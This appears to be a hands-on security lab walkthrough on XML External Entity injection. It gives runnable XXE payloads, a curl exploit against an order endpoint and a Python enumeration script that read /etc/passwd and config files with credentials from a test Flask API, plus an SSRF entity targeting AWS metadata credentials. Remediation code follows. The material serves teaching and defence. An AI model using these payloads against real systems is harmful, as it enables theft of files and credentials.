Exploit XML External Entity (XXE) injection vulnerabilities against a live XML-processing API from Kali Linux:
Classic XXE — inject a SYSTEM entity to read /etc/passwd via the file:// scheme
Credential exfiltration — use XXE to read internal config files with DB passwords and AWS keys
Multi-endpoint XXE — exploit the same vulnerability across three different API endpoints
XXE via order API — exfiltrate data through a product field reflected in the response
XXE via search API — exfiltrate data through search results
Audit and remediation — identify safe vs vulnerable XML parsers and implement defences
All attacks run from Kali against a live Flask API — real file reads returned in real HTTP responses.
Background
XXE (XML External Entity) injection was its own category, A4, in the OWASP Top 10 2017 and was merged into A05 (Security Misconfiguration) in the 2021 edition. It occurs when an XML parser processes external entity declarations, allowing an attacker to reference files, internal URLs, or other resources from the server's perspective.
Real-world examples:
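2021 GitLab (CVE-2021-22205): GitLab passed uploaded images to ExifTool without validating them, and a flaw in ExifTool's DjVu metadata handling (CVE-2021-22204) led to unauthenticated RCE. CVSS 10.0. Over 50,000 servers exposed. Strictly this is code injection through a file parser rather than XXE, but the root cause is the same: untrusted input handed to an over-permissive parser.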
2019 Facebook (Bug Bounty) — XXE in a Word document parser allowed reading internal AWS metadata credentials — the same 169.254.169.254 SSRF chain from Lab 10.
2018 Uber (HackerOne) — XXE in a SAML authentication endpoint (SAML uses XML); researchers read internal files and proved server-side file read.
XXE + SSRF combo — <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role"> — reads AWS IAM credentials, exactly like Lab 10 but triggered via XML instead of a URL parameter.
OWASP coverage: A05:2021 (Security Misconfiguration — insecure XML parser config)
Architecture
Time
40 minutes
Tools
| Tool | Container | Purpose |
|------|-----------|---------|
| curl | Kali | Send XML payloads to all three API endpoints |
| python3 | Kali | Automate XXE payload variations |
| nmap | Kali | Service fingerprinting |
| gobuster | Kali | Enumerate XML endpoints |
Lab Instructions
Step 1: Environment Setup — Launch the Vulnerable XML API
📸 Verified Output:
Step 2: Launch the Kali Attacker Container
📸 Verified Output:
Step 3: Normal XML Usage — Baseline
📸 Verified Output:
Step 4: Classic XXE — Read /etc/passwd
📸 Verified Output:
💡 The <!DOCTYPE> declaration defines a DTD, and the <!ENTITY xxe SYSTEM "file:///etc/passwd"> line inside it declares an external entity whose value is whatever lives at that URI, here a local file. A vulnerable parser fetches the file, substitutes its contents wherever &xxe; appears, and the API returns them in the response. The fix: disable DOCTYPE processing entirely, or at minimum external entity resolution. An API that accepts XML from untrusted clients has no need to load external files.
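To make the shape of the payload concrete, here is a minimal Python sketch that assembles the classic XXE document described above. The helper name `build_xxe_payload` and the root element `data` are assumptions for illustration; the lab's /api/xml/parse endpoint may expect a different root element.

```python
def build_xxe_payload(resource_uri: str, root: str = "data", entity: str = "xxe") -> str:
    """Return an XML document whose root text is a reference to an external entity.

    `root` is a hypothetical element name; adjust it to whatever the target expects.
    """
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [\n'
        # The SYSTEM keyword marks the entity as external: its value is the
        # content found at resource_uri, resolved by the server-side parser.
        f'  <!ENTITY {entity} SYSTEM "{resource_uri}">\n'
        ']>\n'
        # The reference below is where a vulnerable parser substitutes the content.
        f'<{root}>&{entity};</{root}>'
    )


if __name__ == "__main__":
    print(build_xxe_payload("file:///etc/passwd"))
```

Because the URI is just a parameter, the same helper also covers the http:// variant mentioned in the Background section.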
Step 5: XXE — Read Internal Configuration Secrets
📸 Verified Output:
Step 6: XXE via Order Endpoint
📸 Verified Output:
💡 XXE doesn't require a dedicated XML parse endpoint. Any endpoint that accepts XML (order APIs, SAML assertions, RSS feed parsers, Office document uploads, SVG renderers) is potentially vulnerable. The attacker looks for a request field whose value is reflected in the response and places the entity reference in that field.
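The idea of routing the entity through a reflected field can be sketched in Python as follows. The helper names are hypothetical; the `order`, `product`, and `quantity` element names and the JSON `product` key come from the order-endpoint command in this lab, and any other endpoint's field names would have to be discovered first.

```python
import json
from typing import Mapping, Optional


def build_field_payload(root: str, field: str, resource_uri: str,
                        extra: Optional[Mapping[str, object]] = None,
                        entity: str = "file") -> str:
    """Build an XML body that places an external entity reference inside `field`."""
    # Any additional elements the endpoint requires are passed through unchanged.
    extra_xml = "".join(f"  <{k}>{v}</{k}>\n" for k, v in (extra or {}).items())
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [\n'
        f'  <!ENTITY {entity} SYSTEM "{resource_uri}">\n'
        ']>\n'
        f'<{root}>\n'
        f'  <{field}>&{entity};</{field}>\n'
        f'{extra_xml}'
        f'</{root}>'
    )


def reflected_value(response_body: str, field: str) -> str:
    """Pull the reflected field out of a JSON response; empty string if absent."""
    data = json.loads(response_body)
    return data.get(field, "") if isinstance(data, dict) else ""


if __name__ == "__main__":
    print(build_field_payload("order", "product",
                              "file:///tmp/xxe_secrets/config.txt",
                              {"quantity": 1}))
```

Keeping the payload builder separate from the response parsing means only the `root` and `field` arguments change from one endpoint to the next.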
Step 7: XXE via Search Endpoint + Automated Enumeration
📸 Verified Output:
Step 8: Cleanup
Attack Summary
| Phase | Target File | Endpoint Used | Data Exfiltrated |
|-------|-------------|---------------|------------------|
| 1 | /etc/passwd | /api/xml/parse | All OS user accounts |
| 2 | /tmp/xxe_secrets/config.txt | /api/xml/parse | DB password, AWS key, JWT secret |
| 2 | /tmp/xxe_secrets/users.txt | /api/xml/parse | Plaintext credentials |
| 3 | /tmp/xxe_secrets/config.txt | /api/xml/order | Secrets via product field |
| 4 | /tmp/xxe_secrets/users.txt | /api/xml/search | Credentials via results field |
| 5 | Multiple | Automated | /proc, source code, all secrets |
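The automated phase in the summary above could be scripted roughly as below. This is a sketch under assumptions, not the lab's own script: it reuses the /api/xml/order request shape shown in this lab, reads the base URL from the same `TARGET` variable the curl commands use, and the candidate list (including `/proc/self/environ`) is illustrative.

```python
import json
import os
import urllib.request
from typing import Callable, Dict, Iterable


def order_payload(path: str) -> str:
    """XML body for the order endpoint with `path` loaded into the product field."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE order [\n'
        f'  <!ENTITY file SYSTEM "file://{path}">\n'
        ']>\n'
        '<order><product>&file;</product><quantity>1</quantity></order>'
    )


def post_xml(url: str, payload: str, timeout: float = 5.0) -> str:
    """POST an XML body and return the response text."""
    req = urllib.request.Request(
        url,
        data=payload.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def enumerate_files(paths: Iterable[str], send: Callable[[str], str]) -> Dict[str, str]:
    """Try each path and keep those whose content comes back in the product field."""
    loot: Dict[str, str] = {}
    for path in paths:
        try:
            data = json.loads(send(order_payload(path)))
        except (OSError, ValueError):
            continue  # network/HTTP error, or the response was not JSON
        value = data.get("product", "") if isinstance(data, dict) else ""
        if value:
            loot[path] = value
    return loot


if __name__ == "__main__":
    target = os.environ.get("TARGET")
    if not target:
        print("Set TARGET to the lab API base URL first")
    else:
        candidates = [
            "/etc/passwd",
            "/tmp/xxe_secrets/config.txt",
            "/tmp/xxe_secrets/users.txt",
            "/proc/self/environ",  # illustrative guess at a useful /proc entry
        ]
        found = enumerate_files(
            candidates, lambda body: post_xml(f"{target}/api/xml/order", body)
        )
        for path, content in found.items():
            print(f"[!] {path}\n{content}\n")
```

Passing the sender in as a callable keeps the loop independent of the transport, so the same function can be pointed at another endpoint or exercised offline with a stub.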
Remediation
Python — Disable external entities (safe by default in xml.etree.ElementTree)
Python — Using lxml (vulnerable by default — must configure)
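A minimal sketch of an explicitly hardened lxml parser follows. The keyword arguments are real `lxml.etree.XMLParser` options; the names `HARDENED_OPTIONS` and `parse_untrusted` are hypothetical. Recent lxml releases have tightened the entity-resolution default, but setting the options explicitly avoids depending on the installed version.

```python
# Options for lxml.etree.XMLParser that switch off the features XXE relies on.
HARDENED_OPTIONS = {
    "resolve_entities": False,  # never substitute entity references
    "no_network": True,         # never fetch DTDs or entities over the network
    "load_dtd": False,          # do not load external DTDs
    "dtd_validation": False,    # validation would require loading the DTD
    "huge_tree": False,         # keep libxml2's built-in size limits
}


def parse_untrusted(xml_bytes: bytes):
    """Parse untrusted XML with a hardened lxml parser and return the root element."""
    # lxml is third-party (pip install lxml). It is imported here so the
    # option set above can be reviewed on machines without lxml installed.
    from lxml import etree

    parser = etree.XMLParser(**HARDENED_OPTIONS)
    return etree.fromstring(xml_bytes, parser)
```

Create a fresh parser per call, or one dedicated instance for untrusted input, so the hardened settings never mix with a default parser used elsewhere in the application.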
📸 Verified Output (Step 5, internal configuration secrets):
[!] Internal config via XXE:
DB_HOST=db.internal
DB_PASS=Sup3rS3cur3DB
AWS_KEY=AKIA5EXAMPLE
JWT_SECRET=weak-signing-key
REDIS_PASS=redis-secret-pw
INTERNAL_API_KEY=int-api-key-xyz
[!] User credentials via XXE:
admin:Admin@2024!
alice:Alice@456
bob:Bob@789
Commands (Step 6, XXE via the order endpoint):
echo "=== XXE Phase 3: exploit /api/xml/order endpoint ==="
# The order API reflects the 'product' field in the response.
# Inject XXE so the file contents appear in the 'product' field.
curl -s -X POST \
  -H "Content-Type: application/xml" \
  -d '<?xml version="1.0"?>
<!DOCTYPE order [
<!ENTITY file SYSTEM "file:///tmp/xxe_secrets/config.txt">
]>
<order>
<product>&file;</product>
<quantity>1</quantity>
</order>' \
  "$TARGET/api/xml/order" | python3 -c "
import sys, json
resp = json.load(sys.stdin)
print('[!] Secrets exfiltrated via order.product field:')
print(resp.get('product',''))"
📸 Verified Output (Step 6):
[!] Secrets exfiltrated via order.product field:
DB_HOST=db.internal
DB_PASS=Sup3rS3cur3DB
AWS_KEY=AKIA5EXAMPLE
JWT_SECRET=weak-signing-key
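Python example (xml.etree.ElementTree and defusedxml):
import xml.etree.ElementTree as ET

# xml.etree.ElementTree does not resolve external entities. It accepts the
# DOCTYPE itself, but a reference to an external entity raises ParseError.
payload = ('<?xml version="1.0"?>'
           '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           '<x>&xxe;</x>')
try:
    ET.fromstring(payload)
except ET.ParseError as exc:
    print(f"Rejected: {exc}")  # the file is never read

# For untrusted input, prefer defusedxml (third-party: pip install defusedxml).
# By default it refuses entity declarations and external references outright.
import defusedxml.ElementTree as DefusedET
from defusedxml import EntitiesForbidden
try:
    DefusedET.fromstring(payload)
except EntitiesForbidden:
    print("Rejected by defusedxml")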
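Where the API never needs DTDs at all, the "disable DOCTYPE processing entirely" advice can be approximated with the standard library alone. The sketch below is one possible pre-parse check, assuming a hypothetical helper `reject_doctype` and exception `DoctypeForbidden`; it uses expat's `StartDoctypeDeclHandler` to abort as soon as a DOCTYPE appears.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Raise DoctypeForbidden if the document declares a DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError as usual.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Called at the start of <!DOCTYPE ...>, before any entity is declared.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # True marks this as the final chunk


if __name__ == "__main__":
    reject_doctype(b"<order><product>widget</product></order>")  # passes silently
    try:
        reject_doctype(
            b'<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/passwd">]><x>&e;</x>'
        )
    except DoctypeForbidden as exc:
        print(f"Blocked: {exc}")
```

Calling this check before handing the body to the real parser parses the document twice, which is usually acceptable for small API requests; defusedxml's `forbid_dtd=True` option achieves a similar effect in a single pass.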